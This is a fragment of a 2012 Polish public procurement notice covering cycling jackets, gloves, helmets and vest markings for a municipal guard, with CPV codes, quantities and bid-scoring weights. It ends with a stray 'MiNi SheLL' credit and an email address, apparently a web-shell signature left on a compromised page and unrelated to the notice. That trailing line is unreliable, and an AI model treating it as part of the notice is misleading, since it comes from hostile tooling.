<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.82.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> kurtka rowerowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 14 - kurtka rowerowa 			- 70 szt. CPV 18.22.32.00-0
Wiatroszczelna, wodoodporna kurtka rowerowa z membraną w kolorze ciemny granat (zbliżony do czarnego). Rozpinana z przodu na całej długości. Suwak zamka po zamknięciu chowa się w specjalnej kieszonce zapobiegając zadrapaniu szyi i twarzy. Stójka wysoka usztywniana z wykończeniem wewnętrznym wykonanym z materiału typu polar. Zintegrowany i regulowany kaptur w stójce. Z przodu dwie zewnętrzne kieszenie na zamek i kieszeń wewnętrzna zapinana na zamek. W dolnej części pleców jednokomorowa kieszeń na zamek.. Podszewka z siatki. Po odpięciu rękawów może być używana jako kamizelka. Mankiety przedłużonych rękawów wyposażone w regulacje obwodu na rzep i elementy odblaskowe. W dolnej części kurtki regulacja obwodu. Tył kurtki przedłużany. Elementy odblaskowe z przodu i tyłu. Oznakowanie -  na plecach napis STRAŻ MIEJSKA wykonany  czcionką o wysokości 50 mm w kolorze srebrzystym na żółtym odblaskowym tle; z przodu po lewej stronie taki sam napis wykonany czcionką o wysokości 25 mm.
      Termin dostawy:  14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Rękawiczki rowerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 15 - rękawiczki rowerowe 			- 70 par CPV 18.42.40.00-7
Wierzchnia część z przewiewnej elastycznej tkaniny poliamidowej i bawełnianego frotte, dłoń
z przewiewnego poliestru z ergonomicznie kształtowaną wyściółką żelową z syntetycznej skóry, ze
wzmocnieniami w miejscach narażonych na ścieranie,  neoprenowy mankiet zapinany na rzep. 
Kolor: czarny
      Termin dostawy:  14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> kaski rowerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 16 - kaski rowerowe 				- 70 szt. CPV 18.44.41.12-1
Kask wykonany w technologii, która przy niskiej wadze kasku  zapewnia dużą wytrzymałość.
Z otworami przednimi i tylnymi odprowadzającymi nadmiar ciepła w ilości co najmniej 25.
Łatwe i szybkie dopasowanie wielkości kasku z regulacją rozmiaru (obwodu), miękka wyściółka zwiększająca komfort noszenia, siatka z przodu przeciwko owadom.
Kolor jednolity czarny lub zbliżony do czarnego.
      Termin dostawy:  14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.41.12-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> oznakowanie kamizelek taktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 17 - oznakowanie kamizelek taktycznych 	- 260 kpl. CPV 18.42.00.00-9
Napis STRAŻ MIEJSKA - z przodu: minimalna wysokość liter 25 mm, litery w kolorze srebrnym na żółtym odblaskowym tle, wymiary 15 x 8 cm, ż napisane z kropką, mocowany na rzepie;

Napis STRAŻ MIEJSKA - z tyłu: minimalna wysokość liter 50 mm, litery w kolorze srebrnym na żółtym
odblaskowym tle, wymiary 26 x 14 cm, ż napisane z kropką, mocowany na rzepie;
      Termin dostawy:  14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com